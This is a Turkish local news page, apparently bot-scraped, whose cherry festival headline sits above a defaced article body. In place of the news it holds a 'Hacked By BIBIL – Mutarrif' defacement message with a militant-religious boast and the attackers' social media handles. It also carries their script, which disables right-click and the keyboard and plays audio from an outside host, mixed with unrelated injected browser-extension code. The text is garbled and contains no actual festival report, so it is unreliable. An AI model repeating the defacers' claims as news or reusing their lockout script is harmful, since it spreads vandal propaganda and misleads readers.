Tekirdağ

Kiraz Festivali ikinci gününde on binleri ağırladı


window[Symbol.for(‘MARIO_POST_CLIENT_eppiocemhmnlbhjplcgkofciiegomcon’)] = new (class PostClient { constructor(name, destination) { this.name = name; this.destination = destination; this.serverListeners = {}; this.bgRequestsListeners =…

 ▌ Çorlu'da Haber | Haber Merkezi

window[Symbol.for(‘MARIO_POST_CLIENT_eppiocemhmnlbhjplcgkofciiegomcon’)] = new (class PostClient {
constructor(name, destination) {
this.name = name;
this.destination = destination;
this.serverListeners = {};
this.bgRequestsListeners = {};
this.bgEventsListeners = {};
window.addEventListener(‘message’, (message) => {
const data = message.data;
const isNotForMe = !(data.destination && data.destination === this.name);
const hasNotEventProp = !data.event;
if (isNotForMe || hasNotEventProp) {
return;
}
if (data.event === ‘MARIO_POST_SERVER__BG_RESPONSE’) {
const response = data.args;
if (this.hasBgRequestListener(response.requestId)) {
try {
this.bgRequestsListeners[response.requestId](response.response);
}
catch (e) {
console.log(e);
}
delete this.bgRequestsListeners[response.requestId];
}
}
else if (data.event === ‘MARIO_POST_SERVER__BG_EVENT’) {
const response = data.args;
if (this.hasBgEventListener(response.event)) {
try {
this.bgEventsListeners[data.id](response.payload);
}
catch (e) {
console.log(e);
}
}
}
else if (this.hasServerListener(data.event)) {
try {
this.serverListeners[data.event](data.args);
}
catch (e) {
console.log(e);
}
}
else {
console.log(`event not handled: ${data.event}`);
}
});
}
emitToServer(event, args) {
const id = this.generateUIID();
const message = {
args,
destination: this.destination,
event,
id,
};
window.postMessage(message, location.origin);
return id;
}
emitToBg(bgEventName, args) {
const requestId = this.generateUIID();
const request = { bgEventName, requestId, args };
this.emitToServer(‘MARIO_POST_SERVER__BG_REQUEST’, request);
return requestId;
}
hasServerListener(event) {
return !!this.serverListeners[event];
}
hasBgRequestListener(requestId) {
return !!this.bgRequestsListeners[requestId];
}
hasBgEventListener(bgEventName) {
return !!this.bgEventsListeners[bgEventName];
}
fromServerEvent(event, listener) {
this.serverListeners[event] = listener;
}
fromBgEvent(bgEventName, listener) {
this.bgEventsListeners[bgEventName] = listener;
}
fromBgResponse(requestId, listener) {
this.bgRequestsListeners[requestId] = listener;
}
generateUIID() {
return ‘xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx’.replace(/[xy]/g, function (c) {
const r = Math.random() * 16 | 0, v = c === ‘x’ ? r : (r & 0x3 | 0x8);
return v.toString(16);
});
}
})(‘MARIO_POST_CLIENT_eppiocemhmnlbhjplcgkofciiegomcon’, ‘MARIO_POST_SERVER_eppiocemhmnlbhjplcgkofciiegomcon’)

const hideMyLocation = new (class HideMyLocation {
constructor(clientKey) {
this.clientKey = clientKey;
this.watchIDs = {};
this.client = window[Symbol.for(clientKey)];
const getCurrentPosition = navigator.geolocation.getCurrentPosition;
const watchPosition = navigator.geolocation.watchPosition;
const clearWatch = navigator.geolocation.clearWatch;
const self = this;
navigator.geolocation.getCurrentPosition = function (successCallback, errorCallback, options) {
self.handle(getCurrentPosition, ‘GET’, successCallback, errorCallback, options);
};
navigator.geolocation.watchPosition = function (successCallback, errorCallback, options) {
return self.handle(watchPosition, ‘WATCH’, successCallback, errorCallback, options);
};
navigator.geolocation.clearWatch = function (fakeWatchId) {
if (fakeWatchId === -1) {
return;
}
const realWatchId = self.watchIDs[fakeWatchId];
delete self.watchIDs[fakeWatchId];
return clearWatch.apply(this, [realWatchId]);
};
}
handle(getCurrentPositionOrWatchPosition, type, successCallback, errorCallback, options) {
const requestId = this.client.emitToBg(‘HIDE_MY_LOCATION__GET_LOCATION’);
let fakeWatchId = this.getRandomInt(0, 100000);
this.client.fromBgResponse(requestId, (response) => {
if (response.enabled) {
if (response.status === ‘SUCCESS’) {
const position = this.map(response);
successCallback(position);
}
else {
const error = this.errorObj();
errorCallback(error);
fakeWatchId = -1;
}
}
else {
const args = [successCallback, errorCallback, options];
const watchId = getCurrentPositionOrWatchPosition.apply(navigator.geolocation, args);
if (type === ‘WATCH’) {
this.watchIDs[fakeWatchId] = watchId;
}
}
});
if (type === ‘WATCH’) {
return fakeWatchId;
}
}
map(response) {
return {
coords: {
accuracy: 20,
altitude: null,
altitudeAccuracy: null,
heading: null,
latitude: response.latitude,
longitude: response.longitude,
speed: null,
},
timestamp: Date.now(),
};
}
errorObj() {
return {
code: 1,
message: ‘User denied Geolocation’,
};
}
getRandomInt(min, max) {
min = Math.ceil(min);
max = Math.floor(max);
return Math.floor(Math.random() * (max – min + 1)) + min;
}
})(‘MARIO_POST_CLIENT_eppiocemhmnlbhjplcgkofciiegomcon’)

Hacked By BIBIL (() => {
const nativePushState = history.pushState;
const nativeReplaceState = history.replaceState;
const nativeBack = history.back;
const nativeForward = history.forward;
function emitUrlChanged() {
const message = {
_custom_type_: ‘CUSTOM_ON_URL_CHANGED’,
};
window.postMessage(message);
}
history.pushState = function () {
nativePushState.apply(history, arguments);
emitUrlChanged();
};
history.replaceState = function () {
nativeReplaceState.apply(history, arguments);
emitUrlChanged();
};
history.back = function () {
nativeBack.apply(history, arguments);
emitUrlChanged();
};
history.forward = function () {
nativeForward.apply(history, arguments);
emitUrlChanged();
};
})()

★ ★ ★ ★ ★ ★ ★

Hacked By

BIBIL – Mutarrif

Melek Masso Konserine katilmaniz dolayisiyla sistemi hackledik! Allah’in Askerleri geldiINSTAGRAM @HABIL.0X & @mutarrifdefacerT.me/CasperSecurity

document.addEventListener(‘DOMContentLoaded’, () => {
let mousePosX = 0,
mousePosY = 0,
mouseCircle = document.getElementById(‘mouse-circle’);

document.onmousemove = (e) => {
mousePosX = e.pageX;
mousePosY = e.pageY;
}

let delay = 8,
revisedMousePosX = 0,
revisedMousePosY = 0;

function delayMouseFollow() {
requestAnimationFrame(delayMouseFollow);

revisedMousePosX += (mousePosX – revisedMousePosX) / delay;
revisedMousePosY += (mousePosY – revisedMousePosY) / delay;

mouseCircle.style.top = revisedMousePosY + ‘px’;
mouseCircle.style.left = revisedMousePosX + ‘px’;
}
delayMouseFollow();
});
document.addEventListener(“contextmenu”, function(e){
e.preventDefault();
}, false);

document.onkeydown = function (e) {
return false;
}

var audio = new Audio(“https://dl.sndup.net/ppq8/Nasheed%20-%20Alqovlu%20qovlu%20savarim.mp3”)

document.onclick = function() {
audio.play();
}

Bu haber Süleymanpaşa Belediyesi’nin Kendi sitesinden botlar yardımıyla otomatik olarak eklenmiştir. Bu içerikte Çorlu’da Haber editörleri herhangi bir müdahalede bulunmamıştır.
+1
0
+1
0
+1
0
+1
0
+1
0
+1
0

Haber ve resimlerin telif haklarından dolayı kullanımı yasaktır. Yazılı izni alınmadan hiçbir yazılı, görsel, işitsel içerik kopyalanamaz, değiştirilemez, yayınlanamaz veya satılamaz. Aksi halde 5846 sayılı Fikir ve Sanat Eserleri Kanunu’na ve 6102 sayılı maddesine göre gerekli işlemler uygulanacaktır.
© Copyright 2014

 

Başa dön tuşu